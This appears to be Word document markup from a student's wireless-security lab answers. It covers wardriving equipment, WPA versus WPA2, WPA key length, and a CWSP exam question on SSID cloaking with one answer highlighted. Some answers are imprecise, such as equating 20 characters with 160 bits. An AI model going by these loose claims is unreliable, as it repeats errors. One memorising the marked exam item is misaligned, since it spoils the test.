    <w:p w14:paraId="7E23699D" w14:textId="7FE24B4B" w:rsidR="00F4116C" w:rsidRPr="00F4116C" w:rsidRDefault="00F4116C" w:rsidP="00F4116C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wardriving software or app. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276F88BD" w14:textId="1B6FF47E" w:rsidR="00F4116C" w:rsidRPr="00F4116C" w:rsidRDefault="00F4116C" w:rsidP="00F4116C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>GPS to gathering location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31035114" w14:textId="421F31FF" w:rsidR="00F4116C" w:rsidRPr="00F4116C" w:rsidRDefault="00F4116C" w:rsidP="00F4116C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wireless Network card and antenna to sniff the packet in air. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CDDBD4" w14:textId="7F4F075B" w:rsidR="00F4116C" w:rsidRPr="00F4116C" w:rsidRDefault="00F4116C" w:rsidP="00F4116C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Smartphone, laptop or devices that can be used to run access point mapping software. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A66EF2E" w14:textId="4F5ABBCC" w:rsidR="00B26E7B" w:rsidRPr="00B26E7B" w:rsidRDefault="00F4116C" w:rsidP="00B26E7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Transport Tool: Car.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF5EA9D" w14:textId="77777777" w:rsidR="00655F67" w:rsidRPr="00655F67" w:rsidRDefault="00655F67" w:rsidP="001558D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CE358C" w14:textId="32A877BE" w:rsidR="006B4FDF" w:rsidRDefault="00655F67" w:rsidP="001558D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Q11: </w:t>
      </w:r>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">How does WPA compare to WPA2? If you were to set up your own </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>WiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> at home, which would you choose and why? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224816FD" w14:textId="7872FB15" w:rsidR="00655F67" w:rsidRDefault="00655F67" w:rsidP="000912D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:lastRenderedPageBreak/>
        <w:t>WPA was a temporary solution to fix some of the issues in WEP (used the RC4 encryption algorithm</w:t>
      </w:r>
      <w:r w:rsidR="004A5E77" w:rsidRPr="00655F67">
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidRPr="00655F67">
        <w:t xml:space="preserve"> whilst WPA2 was developed as more complete permanent solution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE2324" w14:textId="0F97F4A1" w:rsidR="00655F67" w:rsidRPr="00655F67" w:rsidRDefault="00655F67" w:rsidP="000912D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:t>WPA also was restricted by using the same algorithm as WEP(RC4) for reverse compatibility with existing hardware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04067105" w14:textId="47FB4191" w:rsidR="00655F67" w:rsidRDefault="00655F67" w:rsidP="00655F67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:t>WPA2 however was developed for the next generation and was not restricted using AES algorithm much faster and more secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B3D87D" w14:textId="1630D640" w:rsidR="00655F67" w:rsidRDefault="00655F67" w:rsidP="001558D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A980C05" w14:textId="77777777" w:rsidR="00655F67" w:rsidRDefault="00655F67" w:rsidP="001558D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049C3D7D" w14:textId="10261A03" w:rsidR="00655F67" w:rsidRPr="00655F67" w:rsidRDefault="00655F67" w:rsidP="001558D1">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Q12: </w:t>
      </w:r>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Why </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>20 character</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> key makes WPA Personal more secure? How your experience in the lab supports this argument?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>????</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E09899" w14:textId="44155C90" w:rsidR="00655F67" w:rsidRDefault="00655F67" w:rsidP="00655F67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:t xml:space="preserve">WEP used 40 bits or 5 characters, </w:t>
      </w:r>
      <w:r w:rsidR="00B428FD" w:rsidRPr="00655F67">
        <w:t>whereas</w:t>
      </w:r>
      <w:r w:rsidRPr="00655F67">
        <w:t xml:space="preserve"> WPA uses 20 characters = 160 bits</w:t>
      </w:r>
      <w:r w:rsidR="00B428FD">
        <w:t xml:space="preserve"> which expands the space of possible passwords and makes it significantly more difficult to crack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B361B7C" w14:textId="77777777" w:rsidR="00655F67" w:rsidRDefault="00655F67" w:rsidP="00655F67"/>
    <w:p w14:paraId="499345D8" w14:textId="43ACFAD9" w:rsidR="00655F67" w:rsidRPr="00655F67" w:rsidRDefault="00655F67" w:rsidP="00655F67">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Q13: </w:t>
      </w:r>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>When is SSID cloaking enabled, which of the following occurs? (Choose all that apply.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EB44E3" w14:textId="77777777" w:rsidR="00655F67" w:rsidRPr="00655F67" w:rsidRDefault="00655F67" w:rsidP="00655F67">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(CWSP exam question, research type)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A02FC31" w14:textId="35B917F6" w:rsidR="00655F67" w:rsidRPr="00655F67" w:rsidRDefault="00655F67" w:rsidP="00655F67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The SSID field is set to null in the beacon frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D902D9" w14:textId="5F9BDDB8" w:rsidR="00655F67" w:rsidRPr="00655F67" w:rsidRDefault="00655F67" w:rsidP="00655F67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="231F20"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="231F20"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The SSID field is set to null in the probe request frame.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7995C291" w14:textId="5C094C79" w:rsidR="00655F67" w:rsidRPr="00655F67" w:rsidRDefault="00655F67" w:rsidP="00655F67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="231F20"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="231F20"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The SSID field is set to null in the probe response frame.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC7AB6D" w14:textId="5E4F3556" w:rsidR="00655F67" w:rsidRPr="00655F67" w:rsidRDefault="00655F67" w:rsidP="00655F67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="231F20"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="231F20"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The AP stops transmitting beacon frames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBDFC83" w14:textId="5871A0F2" w:rsidR="00655F67" w:rsidRPr="00655F67" w:rsidRDefault="00655F67" w:rsidP="00655F67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="231F20"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="231F20"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The AP stops responding to probe request frames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1340A0DD" w14:textId="29BE9501" w:rsidR="00655F67" w:rsidRPr="00655F67" w:rsidRDefault="00655F67" w:rsidP="001558D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00655F67" w:rsidRPr="00655F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6B8E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A71ECDA4"/>
    <w:lvl w:ilvl="0" w:tplc="8ADECCDC">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D90DE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="554240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4706EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D562B0E"/>
    <w:lvl w:ilvl="0" w:tplc="8ADECCDC">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3717B7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="89CAB0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B40B3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CDB41BC0"/>
    <w:lvl w:ilvl="0" w:tplc="2D9058A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E03EF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D952B9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E2066E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A17A3C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831FCB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC4C3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4925DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="23164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033761"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94DAD2CE"/>
    <w:lvl w:ilvl="0" w:tplc="8ADECCDC">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151C83"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8DEC129A"/>
    <w:lvl w:ilvl="0" w:tplc="C144F0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903029"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7883D88"/>
    <w:lvl w:ilvl="0" w:tplc="9A0086A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294136"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9FAF280"/>
    <w:lvl w:ilvl="0" w:tplc="FE4EB3E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7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="12"/>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9"/>
    <w:rsid w:val="00081B42"/>
    <w:rsid w:val="000E5BF3"/>
    <w:rsid w:val="000F35FF"/>
    <w:rsid w:val="001558D1"/>
    <w:rsid w:val="001B4878"/>
    <w:rsid w:val="00206ED5"/>
    <w:rsid w:val="002211ED"/>
    <w:rsid w:val="00231DF7"/>
    <w:rsid w:val="00242672"/>
    <w:rsid w:val="00310E2F"/>
    <w:rsid w:val="00364C79"/>
    <w:rsid w:val="00386A86"/>
    <w:rsid w:val="004231E6"/>
    <w:rsid w:val="004A5E77"/>
    <w:rsid w:val="00505BE6"/>
    <w:rsid w:val="00570761"/>
    <w:rsid w:val="005B3163"/>
    <w:rsid w:val="0063245B"/>
    <w:rsid w:val="00655F67"/>
    <w:rsid w:val="006B4FDF"/>
    <w:rsid w:val="006E2DDE"/>
    <w:rsid w:val="00831156"/>
    <w:rsid w:val="00857467"/>
    <w:rsid w:val="00900664"/>
    <w:rsid w:val="0093305A"/>
    <w:rsid w:val="009B0893"/>
    <w:rsid w:val="00A40846"/>
    <w:rsid w:val="00A44AC0"/>
    <w:rsid w:val="00A559A2"/>
    <w:rsid w:val="00A64B30"/>
    <w:rsid w:val="00B26CCC"/>
    <w:rsid w:val="00B26E7B"/>
    <w:rsid w:val="00B428FD"/>
    <w:rsid w:val="00C12CE4"/>
    <w:rsid w:val="00C41DB1"/>
    <w:rsid w:val="00D7233A"/>
    <w:rsid w:val="00D82879"/>
    <w:rsid w:val="00DD3E65"/>
    <w:rsid w:val="00E07415"/>
    <w:rsid w:val="00E1349E"/>
    <w:rsid w:val="00E151EA"/>
    <w:rsid w:val="00E85B82"/>
    <w:rsid w:val="00EB0B6C"/>
    <w:rsid w:val="00F21EA7"/>
    <w:rsid w:val="00F4116C"/>
    <w:rsid w:val="00F52BEB"/>
    <w:rsid w:val="00FA729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CEDF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1971CD0A-48AD-4A4E-92C1-406D7636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DB1"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009006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0664"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00A40846"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="answernumber">
    <w:name w:val="answernumber"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00570761"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E5BF3"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E5BF3"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F21E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4606">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="185367761">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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1130901902">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1257977998">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1306472451">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1339498219">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1396273440">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1583564021">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="20329874">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="916473781">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="365567816">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1219904254">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1789280938">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="708847301">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="564724579">
          <w:marLeft w:val="0"/>
